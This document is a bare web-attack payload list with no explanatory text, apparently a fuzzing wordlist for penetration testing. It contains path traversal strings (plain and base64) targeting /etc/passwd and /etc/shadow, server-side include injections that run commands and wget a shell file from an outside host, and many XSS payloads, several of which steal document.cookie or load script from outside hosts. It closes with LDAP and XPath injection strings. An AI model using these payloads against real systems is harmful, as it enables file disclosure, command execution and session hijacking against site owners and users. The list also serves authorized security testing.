..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00 | |
L2V0Yy9tYXN0ZXIucGFzc3dk | |
L21hc3Rlci5wYXNzd2Q= | |
ZXRjL3Bhc3N3ZA== | |
ZXRjL3NoYWRvdyUwMA== | |
L2V0Yy9wYXNzd2Q= | |
L2V0Yy9wYXNzd2QlMDA= | |
Li4vZXRjL3Bhc3N3ZA== | |
Li4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== | |
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA== | |
<pre><!--#exec cmd="ls" --></pre> | |
<pre><!--#echo var="DATE_LOCAL" --> </pre> | |
<pre><!--#exec cmd="whoami"--></pre> | |
<pre><!--#exec cmd="dir" --></pre> | |
<!--#exec cmd="ls" --> | |
<!--#exec cmd="wget http://website.com/dir/shell.txt" --> | |
<!--#exec cmd="/bin/ls /" --> | |
<!--#exec cmd="dir" --> | |
<!--#exec cmd="cd C:\WINDOWS\System32"> | |
<!--#config errmsg="File not found, informs users and password"--> | |
<!--#echo var="DOCUMENT_NAME" --> | |
<!--#echo var="DOCUMENT_URI" --> | |
<!--#config timefmt="A %B %d %Y %r"--> | |
<!--#fsize file="ssi.shtml" --> | |
<!--#include file=?UUUUUUUU...UU?--> | |
<!--#echo var="DATE_LOCAL" --> | |
<!--#exec cmd="whoami"--> | |
<!--#printenv --> | |
<!--#flastmod virtual="echo.html" --> | |
<!--#echo var="auth_type" --> | |
<!--#echo var="http_referer" --> | |
<!--#echo var="content_length" --> | |
<!--#echo var="content_type" --> | |
<!--#echo var="http_accept_encoding" --> | |
<!--#echo var="forwarded" --> | |
<!--#echo var="document_uri" --> | |
<!--#echo var="date_gmt" --> | |
<!--#echo var="date_local" --> | |
<!--#echo var="document_name" --> | |
<!--#echo var="document_root" --> | |
<!--#echo var="from" --> | |
<!--#echo var="gateway_interface" --> | |
<!--#echo var="http_accept" --> | |
<!--#echo var="http_accept_charset" --> | |
<!--#echo var="http_accept_language" --> | |
<!--#echo var="http_connection" --> | |
<!--#echo var="http_cookie" --> | |
<!--#echo var="http_form" --> | |
<!--#echo var="http_host" --> | |
<!--#echo var="user_name" --> | |
<!--#echo var="unique_id" --> | |
<!--#echo var="tz" --> | |
<!--#echo var="total_hits" --> | |
<!--#echo var="server_software" --> | |
<!--#echo var="server_protocol" --> | |
<!--#echo var="server_port" --> | |
<!--#echo var="server_name --> | |
<!--#echo var="server_addr" --> | |
<!--#echo var="server_admin" --> | |
<!--#echo var="script_url" --> | |
<!--#echo var="script_uri" --> | |
<!--#echo var="script_name" --> | |
<!--#echo var="script_filename" --> | |
<!--#echo var="netsite_root" --> | |
<!--#echo var="site_htmlroot" --> | |
<!--#echo var="path_translated" --> | |
<!--#echo var="path_info_translated" --> | |
<!--#echo var="request_uri" --> | |
<!--#echo var="request_method" --> | |
<!--#echo var="remote_user" --> | |
<!--#echo var="remote_addr" --> | |
<!--#echo var="http_client_ip" --> | |
<!--#echo var="remote_port" --> | |
<!--#echo var="remote_ident" --> | |
<!--#echo var="remote_host" --> | |
<!--#echo var="query_string_unescaped" --> | |
<!--#echo var="query_string" --> | |
<!--#echo var="path_translated" --> | |
<!--#echo var="path_info" --> | |
<!--#echo var="path" --> | |
<!--#echo var="page_count" --> | |
<!--#echo var="last_modified" --> | |
<!--#echo var="http_user_agent" --> | |
<!--#echo var="http_ua_os" --> | |
<!--#echo var="http_ua_cpu" --> | |
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E | |
<<scr\0ipt/src=http://xss.com/xss.js></script | |
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E | |
' onmouseover=alert(/Black.Spook/) | |
"><iframe%20src="http://google.com"%%203E | |
'<script>window.onload=function(){document.forms[0].message.value='1';}</script> | |
xâ€</title><img src%3dx onerror%3dalert(1)> | |
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script> | |
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script> | |
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script> | |
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script> | |
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> | |
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> | |
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script> | |
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> | |
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> | |
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script> | |
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script> | |
<script>alert(document.head.innerHTML.substr(146,20));</script> | |
<script>alert(document.head.childNodes[3].text)</script> | |
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script> | |
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script> | |
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> | |
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> | |
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script> | |
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> | |
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> | |
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> | |
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> | |
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> | |
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> # | |
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # | |
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># | |
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script># | |
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 | |
<script for=document event=onreadystatechange>getElementById('safe123').click()</script> | |
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script> | |
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> | |
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script># | |
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> | |
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> | |
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> | |
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea> | |
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> | |
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E | |
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> | |
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E | |
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> | |
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> | |
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> | |
<a href="javascript:\u0061le%72t(1)"><button> | |
<div onmouseover='alert(1)'>DIV</div> | |
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> | |
<a href="jAvAsCrIpT:alert(1)">X</a> | |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ? | |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? | |
<var onmouseover="prompt(1)">On Mouse Over</var>? | |
<a href=javascript:alert(document.cookie)>Click Here</a> | |
<img src="/" =_=" title="onerror='prompt(1)'"> | |
<%<!--'%><script>alert(1);</script --> | |
<script src="data:text/javascript,alert(1)"></script> | |
<iframe/src \/\/onload = prompt(1) | |
<iframe/onreadystatechange=alert(1) | |
<svg/onload=alert(1) | |
<input value=<><iframe/src=javascript:confirm(1) | |
<input type="text" value=``<div/onmouseover='alert(1)'>X</div> | |
http://www.<script>alert(1)</script .com | |
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ? | |
<svg><script ?>alert(1) | |
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |
<img src=`xx:xx`onerror=alert(1)> | |
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> | |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>? | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>? | |
<svg contentScriptType=text/vbs><script>MsgBox+1 | |
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a | |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> | |
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ | |
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F | |
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ???????????? | |
<object data=javascript:\u0061le%72t(1)> | |
<script>+-+-1-+-+alert(1)</script> | |
<body/onload=<!-->
alert(1)> | |
<script itworksinallbrowsers>/*<script* */alert(1)</script ? | |
<img src ?itworksonchrome?\/onerror = alert(1)??? | |
<svg><script>//
confirm(1);</script </svg> | |
<svg><script onlypossibleinopera:-)> alert(1) | |
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |
<script x> alert(1) </script 1=2 | |
<div/onmouseover='alert(1)'> style="x:"> | |
<--`<img/src=` onerror=alert(1)> --!> | |
<script/src=data:text/javascript,alert(1)></script> ? | |
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? | |
"><img src=x onerror=window.open('https://www.google.com/');> | |
<form><button formaction=javascript:alert(1)>CLICKME | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? | |
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> | |
"><img src=x onerror=prompt(1);> | |
* | |
*)(& | |
*))%00 | |
*()|%26' | |
*()|&' | |
*(|(mail=*)) | |
*(|(objectclass=*)) | |
*)(uid=*))(|(uid=* | |
*/* | |
*| | |
/ | |
// | |
//* | |
@* | |
| | |
admin* | |
admin*)((|userpassword=*) | |
admin*)((|userPassword=*) | |
x' or name()='username' or 'x'='y | |
! | |
%21 | |
%26 | |
%28 | |
%29 | |
%2A%28%7C%28mail%3D%2A%29%29 | |
%2A%28%7C%28objectclass%3D%2A%29%29 | |
%2A%7C | |
%7C | |
& | |
( | |
) | |
)(cn=))\x00 | |
*(|(mail=*)) | |
*(|(objectclass=*)) | |
*/* | |
*| | |
/ | |
// | |
//* | |
@* | |
x' or name()='username' or 'x'='y | |
| | |
*()|&' | |
admin* | |
admin*)((|userpassword=*) | |
